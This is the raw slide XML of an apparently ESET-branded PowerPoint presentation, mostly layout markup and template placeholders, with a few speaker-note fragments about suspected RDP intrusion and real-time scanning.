              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>30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020654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D93D0-32F4-1154-369F-E870741A5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7DD5C6-D8F7-8B4A-F983-424CD8789B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3C4DE2-A646-4081-8667-1071DAA164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AEB1EC-7037-64A1-3E21-A8037B73BC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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>31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56992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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>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091024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Észrevenni is sok idő, de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0"/>
              <a:t> beavatkozás a kulcs.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745278B5-64AB-4E1F-BE3B-63B3040CCE8F}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Aptos" panose="02110004020202020204"/>
              </a:rPr>
              <a:pPr defTabSz="990752">
                <a:defRPr/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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19939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E4AA5-9D89-DB0B-49F8-BC5534F91B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8FC779-3953-07B6-8828-6B9A7BBA07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9EF444-1D48-F9D0-EE4D-C7C0D8E47D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12EF7A-E145-4519-1369-7ABC8B7321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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/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00245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1E8EBA-5B28-45EC-BBB3-A541BCA27473}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:t>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586827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AADC9-09E9-7F50-265A-BFE385AC9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3E91A3-C66A-06BF-1868-0674F084AB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097E66-1272-A897-0890-FCB6C8B9CB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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We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suspect RDP, but no real evidence to support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU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  <a:p>
            <a:endParaRPr lang="en-S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98CB3E-CB15-F0F6-2FF2-BCDA58765E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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>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04803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6CFC5-8042-40B9-FB13-AADD8D3C0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3375E5-D5BF-38A8-5A73-50DD0EDBAA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CCF21C-35CC-32E3-3656-9BBB7299A3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RTS: Real-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>scanner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7E6271-4863-245C-DD4D-67AAA4C382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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>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68864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ED734-3D45-A5F3-1DCC-410DB7A79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ED850C-F417-F86D-A912-7625C8E8C7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5B58F4-FDB1-E719-3739-44F4978C3B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A32E76-21E8-4C48-DADB-3123FE71AF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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/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918495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B3538A-3FB2-7CA2-58B2-B91EE1C24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2EE4B6-4195-1B60-26EC-0290AF3A29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59AF93-70BD-E1D3-47A5-FE78C42A4F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70BA84-43E6-5340-59D7-1E40BB8860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1E8EBA-5B28-45EC-BBB3-A541BCA27473}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:t>11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74908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NULL"/><Relationship Id="rId7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11" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="NULL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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp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0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8.sv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0780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col - text and image - right dark">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="0A18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8DF5C-8DB6-19D9-735A-0616BAD649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0" y="876301"/>
            <a:ext cx="8267700" cy="16605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2 Column Layout Text and image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8FE30D-144C-B987-1C5A-C1E9CDA95C1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44000" y="3057525"/>
            <a:ext cx="8267700" cy="63531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2180">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="679320" indent="0">
              <a:buNone/>
              <a:defRPr sz="1981"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1358638" indent="0">
              <a:buNone/>
              <a:defRPr sz="1981"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2037958" indent="0">
              <a:buNone/>
              <a:defRPr sz="1981"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2717275" indent="0">
              <a:buNone/>
              <a:defRPr sz="1981"/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7B5BF07-9DE2-B4EF-CD9F-C8B683E0A68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8461376" cy="10287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62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1924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Cus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76303" y="1536486"/>
            <a:ext cx="10724574" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="9000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ESET 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76303" y="5255999"/>
            <a:ext cx="10724574" cy="145032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500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685836" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="3000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371670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8" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3429172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6" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Subheadline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8B20EF9-3D25-52F4-8567-10AF721D02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6302" y="7053978"/>
            <a:ext cx="3586164" cy="5159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lang="en-US" sz="2502" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342918" lvl="0" indent="-342918"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F03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6302" y="7614062"/>
            <a:ext cx="3586164" cy="51594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en-US" sz="1602" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342918" lvl="0" indent="-342918"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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250FB943-52AF-0572-835A-1257A71634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6302" y="895203"/>
            <a:ext cx="3586164" cy="412806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marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1602" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1002" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1002" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1002" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1002" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342918" lvl="0" indent="-342918"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7187569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7/16/2025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82378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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D447992B-7191-8F48-C815-56BE3F901FA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-21596846" y="-3066310"/>
            <a:ext cx="38984960" cy="38984960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9000">
                <a:schemeClr val="accent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1B3CF623-E257-A2A4-7DFB-6C5B3832F5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05646" y="8494476"/>
            <a:ext cx="3120056" cy="61863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5647A32-7A64-5B75-DCB8-5FD6F18782D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482400" y="8636446"/>
            <a:ext cx="2510200" cy="3346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691231-64A9-A855-DD52-F0851BCEE5B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994017" y="8619124"/>
            <a:ext cx="12299970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1828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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>www.eset.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>www.welivesecurity.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> @ESETresearch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="A black screen with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856E5A94-BCC8-6A7B-169A-C933BD52F00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46501" y="3792725"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A black screen with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE05BA72-5EEB-32E2-709E-A3C8EB6EDD7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Blur radius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83098" y="2872994"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A black screen with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8773A985-177D-8BA3-E3D1-D9CE1798262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duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent1">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr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Blur radius="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9088" y="5561522"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A black screen with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79E75E79-35E6-DECE-6DCE-56FD1DD63E3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duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent1">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr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Blur radius="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7178" y="0"/>
            <a:ext cx="13591424" cy="340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0998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2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curved object&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E846AC5-1044-BB59-7641-2171D5DB46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52486"/>
            <a:ext cx="23933262" cy="13462462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E5E7C57-1433-5AF4-409D-7545FD88406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3723998" y="-7141249"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E3B0067-202B-95EB-1BBA-63E1565A2C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-5013104" y="4535230"/>
            <a:ext cx="30852901" cy="18460181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A872C756-53E1-7044-C14B-96E014071A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2227569" y="-13468070"/>
            <a:ext cx="48423226" cy="29798134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6008C22B-26F9-7283-1865-8873C5B115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9896354" y="-6486008"/>
            <a:ext cx="13737594" cy="8773513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC8A0239-95DC-D95B-CDE6-C3793687BC5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6194567" y="5858129"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00CD72A3-CE83-C47C-E75A-92833C76EA1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60000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2010741" y="5716619"/>
            <a:ext cx="14486283" cy="1028700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62884D2-4B31-2D45-CCD8-D7106E7608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2453946"/>
            <a:ext cx="12643718" cy="358298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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="96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8E280F0-7234-4C99-DF7D-9281D47803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6304241"/>
            <a:ext cx="12643718" cy="92902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0ACBF2F-61E1-998E-1ECD-246CF5F2E6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8470242"/>
            <a:ext cx="3636005" cy="41356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sk-SK"/>
              <a:t>Job Position</a:t>
            </a:r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D113EAA-484E-B8FC-202F-978EE746D4F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98443" y="897419"/>
            <a:ext cx="3651963" cy="403415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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7F577B32-F13B-2DD8-7DC2-7353307EB5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1" y="7488551"/>
            <a:ext cx="3636005" cy="964848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b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NAME SURNAME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1F716F52-E3A0-15B1-5685-DDE8F2E24B7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24902" y="8470242"/>
            <a:ext cx="3808628" cy="41356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sk-SK"/>
              <a:t>Job Position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4CAE2834-8F6E-9E4B-B319-AEFC18FC931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24903" y="7488551"/>
            <a:ext cx="3808628" cy="964848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b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NAME SURNAME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18932258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iterate type="wd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el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colorful light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE6530D-5DD0-72C4-A106-33952B3839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27461370" y="-20588168"/>
            <a:ext cx="46541235" cy="4654123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!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A74478E-260F-750C-8A34-C9A3FCB9DC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-2001888" y="-12611550"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFA6BE4-4AAE-9B43-C605-9649C05B83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-3690745" y="1485021"/>
            <a:ext cx="30852901" cy="18460181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B3B2CF5-401B-0938-D0C3-4A10527891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8753172" y="-5324594"/>
            <a:ext cx="43317174" cy="26656030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3ADCFD0-779F-E9FE-F595-F5794D66D69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-10893062" y="3861273"/>
            <a:ext cx="13737594" cy="8773513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5DE5859-847A-43BA-54B5-347820F67D3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8615224" y="6696517"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19647EAE-DCAD-847E-1F8A-8E4C1706991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60000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11519624" y="3151896"/>
            <a:ext cx="14486283" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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46646EA8-C239-BA68-E28B-6528B501958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239969" y="3338007"/>
            <a:ext cx="2849666" cy="2820580"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10899"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="sk-SK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2831F1F5-63EB-A163-257D-FF22433D3CF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568219" y="3338007"/>
            <a:ext cx="2849666" cy="2820580"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10899"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="sk-SK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2BDB82E-11EC-3970-F06C-41C0C0FCDD6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896469" y="3338007"/>
            <a:ext cx="2849666" cy="2820580"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10899"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="sk-SK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{379308E5-7090-F562-2784-08C328DFFF8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4224719" y="3338007"/>
            <a:ext cx="2849666" cy="2820580"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10899"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="sk-SK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="A colorful light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4C4EA3-2DCC-C590-B013-385E4F2264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11690" y="-14756387"/>
            <a:ext cx="46541235" cy="46541235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AA7D0381-D6ED-5086-18C8-576F76B1939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71550" y="947091"/>
            <a:ext cx="16395700" cy="146915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6000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="754164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1508328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2262492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3016656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for the panel discussion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29DB3C80-5DAF-293F-1B50-864D7F10754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025019" y="9068017"/>
            <a:ext cx="2237962" cy="247216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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24BF20EE-5FEB-80BC-B0BE-0CCC36CC9C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1246" y="6740498"/>
            <a:ext cx="3457603" cy="517582"/>
          </a:xfrm>
